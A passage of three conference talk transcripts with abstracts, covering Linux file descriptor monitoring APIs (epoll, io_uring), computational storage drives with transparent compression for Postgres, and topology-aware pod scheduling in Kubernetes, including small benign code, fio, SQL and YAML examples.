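    io_uring_submit(&ring);                    /* hand the request to the kernel */

    /* ... the application could make progress on other work here ... */

    struct io_uring_cqe *cqe;
    io_uring_wait_cqe(&ring, &cqe);            /* block until the read completes */
    printf("read completed: %d bytes\n", cqe->res);
    io_uring_cqe_seen(&ring, cqe);

    io_uring_queue_exit(&ring);
    return 0;
}
```

This is roughly what a new application built around completions rather than readiness would do for each I/O operation.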
It's hard to retrofit this into existing applications, especially if you remember that I mentioned that GTK and QT and so on are based on file descriptor monitoring. Using something like this universally would mean basically breaking the APIs and changing the way that applications use file descriptors. They would have to start using asynchronous operations instead of monitoring file descriptors. And so this is kind of hard to do with existing code. I've written a blog post about it that goes into more details about the performance advantages that we could get by doing this. And if you're writing new code, you might consider trying this out and seeing how it works. Okay. We should just briefly mention the other APIs that we don't have time to cover in detail. First of all, there is CIGIO, which is an old mechanism, and it's a signal-based mechanism where you can mark a file descriptor as, please send me CIGIO signals when the file descriptor is ready. But it's rarely used, probably because programming with signals is tricky. It's also not a very expressive interface. It's hard to use, and therefore I've never seen it used. There's Linux AIO, which is similar to IOU ring, but is a precursor to it. It has a subset of the functionality, and so that's why I didn't go into that one, but that's available too. Okay. And then finally, let's move on to some performance data and some benchmarks. I have posted a code for a benchmark. What it does is it receives data on a random file descriptor and then just sends the data back. So, it doesn't change the benchmark. It doesn't change the set of file descriptors that are monitored during the benchmark. It only sets it up once. So this may not be representative of your application, but it does show the raw performance of just the file descriptor monitoring itself, just the waiting. Okay. So let's look at the scalability of all the APIs we've talked about. We see they fall into three classes, right? These curves fall into three groups. The bottom group is select and pull, which isn't a big surprise because we talked a lot about their limitations and how they're inefficient and how they don't scale. So we see here that they really don't do well compared to the others. Although note that the Y axis on this graph doesn't start at zero. So it's not as bad as it looks on the graph, but I wanted to zoom in so we can see these details here. In the middle, we have threads. I wanted to make sure we compare this with an application that just has one thread per IOTask. So we don't lose sight of what programming with threads is like. And you can see here that the performance is just always lower than the E-Poll and IOUring performance at the top when we use threads. That's the blue line in the middle. What's interesting is that IOUring using AIO, so not doing file descriptor monitoring, but doing asynchronous reads and writes, is similar to threads in this benchmark. Now I have to add a caveat. I think that there's a lot more that can be done, whether that's tweaking the benchmark itself to make use of IOUring more efficiently. It's not using busy waiting or any stuff like that. Or extending the IOUring implementation in the kernel to make it more favorable for this type of usage. So I think it could go a lot higher, but that's where it is. And it kind of makes sense because IOUring internally does have a thread pool in the kernel. So eventually it does end up in a thread. And so it kind of makes sense that it's similar to using threads. Okay. 
And finally, at the top, the fastest ones with very similar performance were io_uring doing file descriptor monitoring and epoll. They're both excellent, and you can see that they scale very well with the number of file descriptors — there wasn't a steep curve, they were very flat — so that's nice to see. io_uring is the one that is a little bit more flexible, as I mentioned: it has all these other features that you might find useful in your application, whereas epoll is dedicated purely to file descriptor monitoring. That's the difference between those approaches. I also want to show the CPU efficiency of this. Here we're dividing by the unit of CPU time consumed in order to see a slightly different picture, and we're seeing that threads actually consume a lot of CPU per request compared to the event-driven approaches. That makes some sense, because when we're switching threads we have higher overhead: the scheduler, maybe the caches, and the call stack all need to be changed and cleaned out, especially with security mitigations and so on. Finally, the summary. On this slide I just wanted to show you which of these APIs are the portable ones. I think we saw from the performance results that if you are able to use an event loop library that supports a Linux-specific API, or you have the time to implement it yourself, that's worth it for performance. The thundering herd problem is solved by epoll and io_uring, so if you have those concerns, it's best to use those APIs. And then finally, epoll is the one that's popular today in high-performance applications; I think io_uring might become more popular in the future as people use some of its other functionality together with file descriptor monitoring. Okay. Thank you very much. We can move on to questions.
|
File descriptor monitoring is at the core of event-driven applications from graphical applications to web servers. Over the history of Linux, a number of system calls APIs have been introduced to improve upon the performance, features, and interface design. Developers may ask themselves which API they should use and how they differ. This talk covers select(2), poll(2), epoll(7), as well as the more recent Linux AIO and io_uring APIs. We will look at the classic scalability challenges with these APIs as well as the latest shared kernel memory ring and polling approaches. An understanding of the evolution of file descriptor monitoring in Linux exposes API design topics that have relevance even if you don't need to implement an event loop in your application.
|
10.5446/13951 (DOI)
|
It's really my great honor to have this opportunity to share our experience on how Postgres can greatly benefit from the emerging computational storage on the market. First, a very brief introduction to computational storage. As CMOS technology scaling reaches its limit, the computing infrastructure is transitioning from traditional CPU-only homogeneous computing towards domain-specific heterogeneous computing, where certain computation tasks migrate from the CPU to other computing engines: standalone PCIe accelerators, smart network cards that offload network processing from the CPU, and computational storage drives that offload tasks such as data compression and encryption from the CPU. All of these complement the CPU to form a truly heterogeneous computing infrastructure. In this heterogeneous computing landscape, regarding the commercialization of computational storage, data-path transparent compression is apparently the first low-hanging fruit to pick. Its basic idea is very simple: compression is done in hardware on the I/O path, completely transparent to the OS and the user applications. Our current product uses a single FPGA to handle both flash control and per-4KB Zlib compression. We implement the flash translation layer in our kernel-space driver, which exposes the storage drive as a standard block device to the Linux block layer. Now, let's see how such a storage drive could benefit Postgres. We know that Postgres does not compress table data on its own unless the record size is large, for example around 2 KB. As a result, end users have to rely on the underlying storage hierarchy in order to bring data compression into the picture. Normally the first option is to run Postgres on file systems that support native transparent compression, such as ZFS and BTRFS. Internally, those file systems carry out block compression and store each compressed block over one or multiple 4 KB sectors on the storage device. The 4 KB alignment constraint causes storage space waste and degrades the compression ratio. In order to improve the compression ratio, we could increase the compression block size, for example from 8 KB to 32 KB. But with the 8 KB Postgres database page size, a larger compression block size will result in higher read and write amplification at the file system level, leading to larger database performance degradation. To improve the compression ratio, another option is to make those file systems apply much more powerful compression libraries: for example, instead of LZ4 we could apply Zstandard or Zlib to improve the compression ratio, of course at the cost of CPU overhead. This will also lead to larger database performance degradation. So in addition to this inherent compression ratio versus performance tradeoff, ZFS and BTRFS are in general far less popular compared with journaling file systems like EXT4 and XFS, which, however, do not support transparent compression at all. So to support data compression, another option is to use a block layer with built-in transparent compression, such as the VDO module in the latest Linux kernel. Operating underneath the file system, such block layer modules can transparently compress each 4 KB block and pack multiple compressed blocks into one 4 KB sector. Compared with file system level compression, the compression ratio of such block layer modules could be even lower, or much lower.
So to improve this compression ratio, the only option is to apply more powerful compression libraries, which will, of course, lead to a larger performance degradation. So up to now, we can see that regardless of file system level or block layer transparent compression, the system is always subject to a strict tradeoff between the storage cost saving and the database performance degradation. Moreover, due to the inherent implementation constraint, neither file system nor a block layer could achieve high data compression ratio. So as a result, end users typically just forget about the data compression and just run post-grace on normal storage hierarchy, leaving those highly compressible data completely uncompressed on storage devices. Seems like there is nothing we can do here. Actually, this is where the hardware community can come to help. How about let us make each storage device capable of carrying out hardware-based compression, being completely transparent to the software stack? This would bring data compression back to the picture without suffering from the storage cost versus database performance tradeoff. Such storage devices are called computational storage drive with data pass transparent compression. So this cartoon further illustrates its difference from current practice. On the left-hand side is the current practice where we use either CPU or accelerator to handle data compression and deploy normal NVMe SSD. The right-hand side shows the computational storage drive with data pass transparent compression. Here a single FPGA combines the functionality of a flash controller with the hardware compression and the decompression engine. We handle all the FPGA design and programming to enable a very simple and convenient plug and play solution for end users. By combining the SSD and the compression functions altogether into a single chip, this storage drive, phrase up, hosts at CPU cycles, minimizes the data movement and enables the compression throughput to scale with the storage capacity. So in the remainder of this talk, I will discuss the basics of such a storage hardware and its application to Postgres. From the functionality perspective, computational storage drive with data pass compression is logically equivalent to the block layer transparent compression as we just discussed earlier. Both of them compress each 4K byte user data being transparent from file systems and the user applications. However, from the implementation perspective, our computational storage drive integrates hardware-based Zlib compression which can achieve higher compression ratio at zero CPU cost. Moreover, it tightly places all the compressed blocks in flash memory without any storage space waste, which can further boost the overall data compression ratio. So this figure compares the compression ratio of our computational storage drive with several mainstream compression libraries, including LZ4, the standard and the Zlib. We use the Canterbury corpus file as the test bench and set the compression block size at 8K byte for all the compression libraries and align each compressed block to 4K byte boundary. The results clearly show that our drive could achieve the best compression ratio even compared with the very powerful compression libraries like Zlib and Zlib. So this slide shows the basic FIO testing on our drive and a competing high-end NVMe drive. Both are 3.2 terabytes. FIO generates heavy IO workloads across the entire 3.2 terabytes storage space. 
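For readers who want to reproduce something similar, a representative fio job file might look like the one below. This is not the exact job used in the talk — the device path, queue depth, and job count are placeholders; sweeping rwmixread from 100 down to 0 and bs across 4k/8k/16k gives the axes used in the figures.

```ini
; illustrative fio job: 8 KB random mixed I/O across the whole device
[global]
ioengine=libaio
direct=1
time_based=1
runtime=300
iodepth=32
numjobs=4
group_reporting=1

[randrw-8k]
filename=/dev/nvme0n1
rw=randrw
rwmixread=70
bs=8k
```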
The three figures here show the random IOPS when each I/O request is either 4 KB, 8 KB or 16 KB. In each figure, the horizontal axis is the read percentage in the total I/O workload. As the workload changes from read-only to write-only, the IOPS of the normal NVMe drive drops significantly because of its internal garbage collection overhead. In comparison, on our drive the built-in transparent compression can reduce the data traffic on the fly, leading to much less internal garbage collection activity. As a result, not surprisingly, our drive with built-in transparent compression can achieve much higher IOPS, as shown in the figures. So now let's see how Postgres performs when running on drives with built-in transparent compression. Here we run five different sysbench workloads on both our drive and the competing high-end NVMe drive. We keep all the Postgres parameters at their default settings, and the dataset size is about 2 terabytes. Even though sysbench generates data randomly, with relatively low compressibility, the results still show that our drive can transparently compress the 2 TB dataset to less than 800 GB, representing about a 60% storage cost reduction. This figure compares the TPS of the five sysbench workloads. For write-intensive workloads like update non-index and update index, both our drive and the competing NVMe drive have the same TPS performance. At first glance, this seems to contradict the fio random IOPS comparison we just showed: our drive achieves so much better random IOPS under fio testing, but it does not show up in the Postgres TPS comparison. The main reason is that the dataset size and the write I/O intensity here are not large enough to trigger garbage collection inside the storage drive. Therefore, neither drive experiences internal garbage collection, and as a result they tend to have similar performance under write-intensive workloads. Meanwhile, we can see that the read-intensive workloads have noticeably better TPS performance on our drive. So where does the gain come from? The reason is that by compressing each page, we reduce the probability that different read requests access the same flash memory chip. This leads to higher page read throughput, and hence the higher TPS under the read-intensive workloads. So beyond such straightforward use, we can go one step further to make Postgres take better advantage of a storage drive with built-in transparent compression. First, we all know that Postgres uses a parameter called fillfactor to control the amount of space reserved in each 8 KB page for future updates. The value of fillfactor directly determines the trade-off between database performance and storage cost. If we reduce the fillfactor to leave more space for future updates in each page, the database performance will improve, especially under write-intensive workloads, but meanwhile the storage cost will accordingly increase. As a result, Postgres by default sets the fillfactor to 100, or 100% — that is, it does not purposely reserve any space within each page for future updates — simply in order to minimize the storage cost. Interestingly, once Postgres runs on a storage drive with transparent compression, the storage overhead caused by the reserved space largely disappears, because Postgres initializes the reserved space as all zeros, and the transparent compression can compress those all-zero segments extremely well.
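For reference, fillfactor is an ordinary per-table storage parameter in Postgres, so the experiment only needs standard SQL. The table name and columns below are just illustrative, roughly in the shape of a sysbench table:

```sql
-- Leave 25% of every 8 KB heap page free for future updates (the default is 100).
CREATE TABLE sbtest1 (
    id  bigserial PRIMARY KEY,
    k   integer NOT NULL DEFAULT 0,
    c   char(120) NOT NULL DEFAULT '',
    pad char(60)  NOT NULL DEFAULT ''
) WITH (fillfactor = 75);

-- Or change it on an existing table; only newly written pages honour the new
-- value, so a table rewrite (e.g. VACUUM FULL) is needed to repack old data.
ALTER TABLE sbtest1 SET (fillfactor = 75);
```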
This naturally enables Postgres to set the fillfactor more aggressively without sacrificing physical storage space. To illustrate this, let the blue and black dots represent the operating points when using our drive and the normal NVMe drive: with the default fillfactor of 100%, they have pretty much the same performance, and our drive can cut the physical storage cost in half through transparent compression. But once we reduce the fillfactor to, let's say, 50%, under the normal drive the storage cost directly doubles while the performance improves — a very clear trade-off between performance and storage cost. Under our drive with transparent compression, we can expect pretty much the same performance improvement, but meanwhile the storage cost remains almost unchanged. So we further carried out sysbench TPC-C benchmarking. Here we considered two different dataset sizes, 740 GB and 1.4 TB. The results show that as we reduce the fillfactor from 100 to 75, the TPS performance can improve by about 33%. Under the normal NVMe drive, the physical storage space usage jumps from 740 GB to 905 GB, or from 1.4 TB to 1.7 TB. In comparison, under our drive with built-in transparent compression, we see the same 33% TPS performance improvement, and meanwhile the physical storage space only slightly increases, from 178 GB to 189 GB, or from 342 GB to 365 GB. So this study clearly shows that by configuring the fillfactor parameter, Postgres can very nicely take better advantage of transparent compression to further improve TPS performance without compromising the physical storage cost. Moreover, we also studied the impact on write amplification. We all know that NAND flash memory suffers from limited program/erase cycling endurance, which becomes a bigger and bigger issue with technology scaling, especially for the upcoming QLC NAND flash memory technology that stores 4 bits in one memory cell. As a result, it is more and more important to reduce the application-level write amplification. Meanwhile, the B-tree data structure underlying Postgres is well known for its large write amplification for workloads with relatively small record sizes. So to evaluate how a computational storage drive with built-in transparent compression could help to reduce the write amplification for Postgres, we carried out further experiments using the three write-intensive sysbench OLTP workloads. We ran the testing on two different file systems, EXT4 and BTRFS. This figure shows the write amplification results under the three different sysbench workloads: update non-index, update index, and write only. We also considered two scenarios with different numbers of client threads, that is, eight clients and 32 clients. For each case, we can clearly see that when using our computational storage drive, the CSD 2000, the overall system write amplification is reduced by three times, which is consistent across the different workloads and file systems. So to materialize the storage cost saving for end users, our drive can expose a logical storage capacity that is much larger than the true physical storage capacity, for example by two times, four times, or even more. Of course, due to runtime data compression ratio variation, users must be able to monitor the physical storage space usage and manage the data storage accordingly. In this context, we provide two levels of support.
First, we provide IO control and the CISFS API for users to query the runtime physical storage space usage. This can be easily integrated into existing storage space management tool set. To make things even simpler, we also provide a space balancer that runs as a background daemon to ensure that file system will never run out of physical storage space before using up the total logical storage space. So here, let's use a cartoon to explain how the space balancer works. So given a drive with a 3.2 terabyte raw physical storage capacity, suppose the user estimates her data compression ratio is about 2 to 1. So she could just format the drive as a 6.4 terabyte. That is, the file system sees the total 6.4 terabyte logical storage space, even though there is only 3.2 terabyte physical storage space inside the drive. Suppose the user first writes, let's say, 1 terabyte data into the drive that are internally compressed to 0.5 terabyte. So this leaves 5.4 terabyte free logical storage space at the file system level and 2.7 terabyte free physical storage space inside the drive, still satisfying the projected 2 to 1 compression ratio. So the file space balancer does not do anything here. But if the user writes another 1 terabyte data that are totally incompressible, then we have only 4.4 terabyte free logical storage space at the file system level. There's only 1.7 terabyte free physical storage space inside the drive, which does not meet the projected 2 to 1 compression ratio. This means the file system faces a risk that the physical storage space may run out before it uses up all the logical storage space. So at this time, the background file space balancer will automatically kick in and create a virtual 1 terabyte balancer file on the file system. This virtual balancer file does not consume any physical storage space. Then as a file system level, we see only 3.4 terabyte free logical storage space and inside the drive, there is a 1.7 terabyte free physical storage space so that we can again meet the projected 2 to 1 compression ratio. By using the file space balancer, users do not need to change anything in their existing storage monitoring and management system. So up to now, we have been mainly focusing on our computational storage drive that can perform hardware-based transparent compression. Actually we are not the only company in this area, and storage hardware with built-in transparent compression is now quickly becoming pervasive. Most all-flash arrays support built-in transparent compression. Storage drives with built-in transparent compression are being commercialized also by C gate, and many similar products are coming very soon. Moreover, cloud vendors already started to deploy hardware compression capability. This will make cloud-native transparent compression readily available in the near future. So now it may be the right time for the database community to study how relational database like Postgrease can take full advantage of such a new storage hardware. So in the following, I will present two simple ideas along this direction and would love to explore deeper engagement with the Postgrease community. So the first idea is to apply a dual in-memory versus un-storage-page format in Postgrease, which can further improve the data compression ratio on storage hardware with built-in transparent compression. Motivated by the column store, the basic idea here is very simple. When a page stays in the database cache memory, we keep its conventional role-based format. 
When flushing a page from cache memory to storage, the database converts the page on the fly to a column-based format and applies certain CPU-light transformations to each column to improve the data compressibility. To demonstrate this simple concept, we used InnoDB as a test vehicle, and the results show that we could improve the data compression ratio by 40% with very minimal performance impact. It would be very interesting to see how this idea could be integrated into the Postgres storage engine. The second idea is to reduce the write I/O traffic caused by full page writes in the write-ahead log (WAL) in Postgres. We know that Postgres uses full page writes to enhance reliability, at the cost of higher write I/O traffic. For write-intensive workloads, this can lead to noticeable performance degradation. The idea here is that, by leveraging transparent compression, we pad zeros into the write-ahead log so that each 8 KB full page is always aligned to a 4 KB boundary on the storage device without sacrificing storage cost. Therefore, each 8 KB full page in the write-ahead log spans exactly two 4 KB sectors in the file system. Meanwhile, we can leverage the file range clone feature in file systems to clone the 8 KB page from the table space into the write-ahead log. Although ZFS and BTRFS have supported file range cloning from the very beginning, the journaling file system XFS only started to support it very recently. This makes it possible to realize the full page write through a file range clone. As a result, we can eliminate the write I/O traffic caused by full page writes, which not only increases the flash memory endurance but also improves the database performance. Okay, so, conclusion. The emerging storage hardware with built-in transparent compression is a perfect match for PostgreSQL. Without changing a single line of code, PostgreSQL can benefit from such storage hardware in terms of both storage cost and performance. Moreover, if we are allowed to slightly modify the source code, there is a much larger design space for PostgreSQL to take better advantage of such storage hardware, and we just presented two simple ideas as examples. So at ScaleFlux, we sincerely look forward to working with the PostgreSQL community to explore how PostgreSQL could take full advantage of such new computational storage drives. This ends my talk. Thank you very much.
|
This proposed talk will present how Postgres could seamlessly and significantly benefit from replacing normal solid-state drives (SSDs) with emerging computational storage drives (CSDs). Aligned with the grand trends towards heterogeneous and near-data computing, computational storage has gained tremendous momentum and led to an on-going industry-wide effort on expanding the NVMe standard to support CSD. The first generation CSD products have built-in transparent compression, which can be deployed into existing computing infrastructure without any changes to the OS and applications. This proposed talk will discuss and present: (1) brief introduction to commercially available CSDs with built-in transparent compression, (2) experimental results that show, by replacing leading-edge normal SSD with CSD, one could reduce the storage cost by over 50% and meanwhile achieve 30% better Postgres TPS performance, and (3) experimental results that show CSD could meanwhile significantly reduce the Postgres write amplification, which enables the use of emerging low-cost QLC flash memory to further reduce the system storage cost. Finally, this proposed talk will discuss the potential of leveraging CSDs to improve the efficiency of important operations in Postgres.
|
10.5446/14104 (DOI)
|
Hello, everyone. Thanks for taking the time to attend this talk. My name is Swati Sehgal, and I'm a senior software engineer on the Telco 5G compute team at Red Hat. My team and I have been working on enhancing Kubernetes and OpenShift to deliver leading-edge solutions and innovative enhancements across the stack. Our goal is to enable customers and partners to run high-throughput and latency-sensitive cloud-native networking functions on OpenShift. I've been working with engineers and stakeholders from Red Hat, Huawei, Nokia, Samsung and Intel with the goal of enabling topology-aware scheduling in Kubernetes, and today I'm going to be talking about the work we've done on this project so far. Today's agenda includes hardware topology: I'll explain the term NUMA, why topology alignment is needed, and how topology alignment can be achieved in Kubernetes. We're going to discuss the topology unawareness of the Kubernetes default scheduler and try to understand what leads to that and how the default scheduler works. I'll also explain a proposal for enabling topology-aware scheduling, the key components that we proposed, as well as the end-to-end working solution. I'll also talk about the current status and the use cases, and wrap up by providing a few pointers for future reference. So let's look into the first item, hardware topology. What is NUMA and why is NUMA alignment important? NUMA stands for Non-Uniform Memory Access. It is a technology available on multi-CPU systems that allows different CPUs to access different parts of memory at different speeds. Any memory directly connected to a CPU is considered local to that CPU and can be accessed very fast, as opposed to memory which is not directly connected to a CPU, which is considered non-local. On modern systems, the idea of local versus non-local memory can be extended to peripheral devices such as NICs or GPUs. Local memory on a NUMA system is divided into a set of NUMA nodes, with each NUMA node representing the local memory for a set of CPUs or devices. For example, in the figure here, CPU cores 0 to 3 and devices connected to PCI bus 0 would be part of NUMA node 0, whereas CPU cores 4 to 7 and devices connected to PCI bus 1 are part of NUMA node 1. In this example we show a one-to-one mapping of NUMA node to socket. This is not necessarily the case: there can be multiple sockets on a single NUMA node, or the individual CPUs or devices of a single socket may be connected to different NUMA nodes. Now, let's move on to why NUMA alignment is important. For performance-sensitive applications in the fields of Telco 5G, machine learning, AI and data analytics, CPUs and devices should be allocated such that they have access to the same local memory. Another example is DPDK-based networking applications, which require resources from the same NUMA node for optimum performance. So the next question is what NUMA alignment means in a Kubernetes context and how we achieve NUMA alignment in Kubernetes. In order to illustrate aligned and non-aligned resource allocation, let's consider a simple scenario. Here we have a system with two NUMA cells. Let's consider a workload requesting one SR-IOV virtual function and two CPU cores, and see how the allocated resources end up aligned differently in the two scenarios shown here (a pod spec for such a workload is sketched below).
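As a concrete illustration of such a workload — the image and, in particular, the SR-IOV resource name below are placeholders, since the actual resource name depends on how the device plugin is configured in a given cluster — a Guaranteed-QoS pod requesting two exclusive CPUs and one virtual function might look like this:

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: numa-sensitive-workload
spec:
  containers:
  - name: dpdk-app
    image: example.com/dpdk-app:latest          # placeholder image
    resources:
      requests:
        cpu: "2"
        memory: "1Gi"
        intel.com/sriov_netdevice: "1"          # illustrative SR-IOV VF resource name
      limits:
        cpu: "2"                                # requests == limits gives Guaranteed QoS,
        memory: "1Gi"                           # which is needed for exclusive CPUs under
        intel.com/sriov_netdevice: "1"          # the static CPU Manager policy
```

Whether the two CPUs and the virtual function actually end up on the same NUMA node is then decided on the node by the kubelet's Topology Manager.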
So the first diagram shows the case where all the resources are aligned on the same NUMA node, which will lead to optimum performance, whereas the second scenario shows the case where resources are not allocated from the same NUMA node, which can lead to underperformance. At a node level, Topology Manager, which is a Kubernetes component, coordinates the topology of the resources that are allocated; this includes the resource allocation of CPUs and devices. Topology Manager has flexible policies, and you can define the scope for resource alignment. It orchestrates CPU Manager, Device Manager and the upcoming Memory Manager, and it allows workloads to run in an environment which is optimized for low latency. In addition to that, it has a set of node-level policies — for example best-effort, restricted, and single-numa-node — and a scope that defines whether you want resource alignment at the pod level or the container level. It basically orchestrates the resource managers I mentioned, like CPU Manager and Device Manager, by gathering hints from them and using those along with the policies to align resources, allowing workloads to run in an environment that is optimized essentially for low latency. So now that we know that Topology Manager takes care of resource alignment, you might ask: what's the gap here? The topology unawareness of the Kubernetes default scheduler. The challenge is that the default scheduler is topology unaware. Even with the introduction of Topology Manager enabling topology alignment of requested resources, the scheduler's lack of knowledge of resource topology can lead to unpredictable application performance — in general, underperformance — and in the worst case a complete mismatch between resource requests and kubelet policies: basically scheduling a pod where it's destined to fail, potentially entering a topology affinity error failure loop. So let's try to understand this with the help of a better example. We have two worker nodes here, worker A and worker B, with 40 CPUs and eight devices split equally across NUMA nodes, meaning that there are 20 CPUs and four devices on each NUMA node of each worker node. In this case, both worker nodes have been configured with the single-numa-node Topology Manager policy, which essentially means that all the resources should be allocated from the same NUMA node. Here we show a scenario where the resources consumed by the workloads already running on these nodes are distributed differently across the NUMA nodes, while the accumulated resource consumption — and hence the allocatable resources on each node — is the same. So when an application requests four device instances and four CPUs and needs to be placed, the scheduler finds worker B to be a perfectly fit candidate for scheduling the pod. However, as you can see, the Topology Manager, which has been configured with the single-numa-node policy, will not be able to align the resources on a single NUMA node, and the pod will end up with a topology affinity error. So let's talk about how the default scheduler works; let's try to understand it with the help of this diagram. On the left we have a pod which is requesting resources. The resource request, as part of the pod spec, goes to the API server. The scheduler gets the node objects corresponding to the nodes that are part of the cluster. As the scheduler is essentially a controller, it looks for pods that haven't been assigned to a node, and it then runs its filtering and scoring algorithms to identify a suitable node where the pod should be placed.
Once a suitable node has been identified, the scheduler updates the pod object and records the node name where it should run. The kubelet of the chosen node then starts provisioning resources. So for example, if this particular node, node one, has been selected, the kubelet on that node kicks in and starts looking into resource allocation. Topology Manager, as I mentioned, is a kubelet component: it starts doing its hint calculation to identify which resources it can allocate such that all the resources can be aligned. There are two possibilities. Either Topology Manager is able to admit the pod and the pod is up and running, or Topology Manager is unable to admit the pod and rejects it, which results in a topology affinity error. If the pod is part of a Deployment or ReplicaSet, this results in runaway pod creation, because the subsequent pods that get created again end up with a topology affinity error. So in order to optimize cluster-wide performance of workloads and resource utilization, and enhance the overall performance of the system as a whole, the default scheduler needs to be enhanced to increase the likelihood of a pod landing on a node where it will fit. So let's talk about the proposed solution: how do we enable topology-aware scheduling capability in Kubernetes? The key components of our proposal are the Pod Resources API, Node Feature Discovery, the topology-aware scheduler plugin, and the node resource topology API. Let's dive into each of these items and try to understand them better. The Pod Resources API is a kubelet endpoint for pod resource assignment. It was enhanced to add support for CPU and device topology, plus an additional endpoint to enable watch support and to obtain allocatable resource information. The second part is Node Feature Discovery. We started working on a component called the resource topology exporter with the goal of exposing resource topology information through CRDs, and the Kubernetes SIG recommended that we try to consolidate this work into Node Feature Discovery. Node Feature Discovery was — and is — already a popular project. It is a per-node agent which exposes hardware capabilities in the form of node labels, annotations, and extended resources, so exposing hardware topology information as CRDs was just a natural next step. NFD basically runs as a DaemonSet: it collects the resources allocated to running pods along with the associated topology information, identifies which NUMA nodes those resources correspond to, and exposes CRDs, which gives us information about the resources available at the NUMA-node level. Next, the topology-aware scheduler plugin: this is the scheduler plugin that uses the per-node CRD instance to make a NUMA-aware placement decision. And the node resource topology API: this is the CRD API which is used by NFD and the scheduler plugin, so essentially it acts as the glue between both of these components. So now, moving back to the example I showed previously: we have NFD, which uses the Pod Resources API to gather information about the allocated resources and the NUMA nodes those resources came from, and once we determine that, we are able to expose per-NUMA allocatable resources as part of a CRD. So now, when the pod comes in, it goes to the API server, and the topology-aware scheduler plugin uses the CRD to make a more topology-aware scheduling decision.
It runs a simplified version of the topology manager alignment logic to determine the node which is suitable to place the pod. Important thing to note here is that topology manager still runs its alignment logic at a node level. So after the pod has been placed on the node, again the resource allocation for the corresponding pod needs to happen and again topology manager still runs that alignment algorithm. So now circling back to the example that I had shown previously. Let's try to see what would happen when we have topology aware scheduling enabled in our cluster. So now topology aware scheduler has a more granular view of the resources on a NUMA node basis. So in this diagram here, you can clearly see that the worker A and NUMA node 1 is the one which is empty, which is represented by the data over here and it's clearly visible to topology aware scheduling to make the right decision as opposed to previously where worker B was a valid enough candidate for the workload to be placed. So again, when the same workload comes, pod which is now requesting four CPUs and four devices, the scheduler knows that worker B will fulfill this request and hence places the pod onto that node. So let's talk about the current status of this project. In terms of the pod resource API changes, the Kubernetes enhancement proposals have been merged. We have introduced device to pod G and CPU ID information as part of the pod resource API and the pull request corresponding to that has been merged. We are targeting get allocatable resources for Kubernetes 1.21 release. In terms of node feature discovery work, the resource topology enablement, the resource topology exporter, the Kubernetes enhancement proposal and the code is ready. The enhancement proposal is still being reviewed, but the code is all up and ready. We've had initial discussions with the NMD maintainers and stakeholders. We have like an issue. We have a proposal doc to capture all the design discussion in terms of how do we proceed about enabling resource hardware topology through CRDs in NMD itself. Development work is currently work in progress and the initial demo can be seen here. In terms of the topology aware scheduler plugin, the KEP and code, the code has been done. The KEP is currently still being reviewed and the node resource topology API work is still being discussed in the community. So there's some work that we need to do in terms of the value proposition to prove to the Kubernetes component community how this feature would be useful with different use cases as well as at a larger scale. Let's talk about the use cases. We've been extremely fortunate to have the opportunity to work with stakeholders and contributors from Intel, Huawei, Nokia, Samsung. We've contributed and supported this work. Here are some of the use cases that we have. We have VRan user plane, use case by Nokia, where packets need to be processed with extremely high bandwidth. Pods handling the user traffic require SRVVS, huge pages and CPU resources from the same NMD. Due to failover requirements, the scheduling of these pods need to be extremely reliable. This case from Samsung is about performance intensive high throughput network functions or networking applications for containerized 5G deployments and MEC. The cloud native networking function cluster level NUMA alignment by Intel. Where we've come across an interesting scenario, so far we've been mostly talking about full alignment of these sources. 
But here, Intel had raised an interesting point about having partial alignment of resources. What if you just want to align CPU and huge pages? In certain scenarios, don't care about SRVVS, for example. The fourth use case is GPU direct scheduling use case by Visat, which requires direct GPU to net transfer over PCI instead of through CPUs. For detailed information on these use cases and more such use cases, please refer to the use case dock linked here. In this document, you'd find NVIDIA's way of preventing topology affinity error. It's a very interesting read and I will highly recommend it. Finally, we have references of the documents and demos that we've worked on so far. We would really love to have more contributors. So please get involved and get in touch with us on topology where scheduling Kubernetes Slack channel. Also, you can email me or find me on Slack. Thank you very much.
|
With Kubernetes gaining popularity for performance-critical workloads such as 5G, Edge, IoT, Telco, and AI/ML, it is becoming increasingly important to meet stringent networking and resource management requirements of these use cases. Performance-critical workloads like these require topology information in order to use co-located CPU cores and devices. Despite the success of Topology Manager, aligning topology of requested resources, the current native scheduler does not select a node based on it. It's time to solve this problem! We will introduce the audience to hardware topology, the current state of Topology Manager, gaps in the current scheduling process, and prior out-of-tree solutions. We'll explain the workarounds available right now: custom schedulers, creating scheduling extensions, using node selectors, or manually assigning resources semi-automatically. All these methods have their drawbacks. Finally, we will explain how we plan to improve the native scheduler to work with Topology Manager. Attendees will learn both current workarounds, and the future of topology aware scheduling in Kubernetes. Kubernetes has taken the world by storm attracting unconventional workloads such as HPC Edge, IoT, Telco and Comm service providers, 5G, AI/ML and NFV solutions to it. This talk would benefit users, engineers, and cluster admins deploying performance sensitive workloads on k8s. Addition of newer nodes running alongside older ones in data centers results in hardware heterogeneity. Motivated by saving physical space in the data centers, newer nodes are packed with more CPUs, enhanced hardware capabilities. Exposing to use fine grain topology information for optimised workload placement would help service providers and VNF vendors too. We’ll explain numerous challenges encountered in efficiently deploying workloads due to inability to understand the hardware topology of the underlying bare metal infrastructure and scheduling based on it. Scheduler’s lack of knowledge of resource topology can lead to unpredictable application performance, in general under-performance, and in the worst case, complete mismatch of resource requests and kubelet policies, scheduling a pod where it is destined to fail, potentially entering a failure loop. Exposing cluster level topology to the scheduler empowers it to make intelligent NUMA aware placement decisions optimizing cluster wide performance of workloads. This would benefit Telco User Group in kubernetes, kubernetes and the overall CNCF ecosystem enabling improved application performance without impacting user experience.
|
10.5446/14160 (DOI)
|
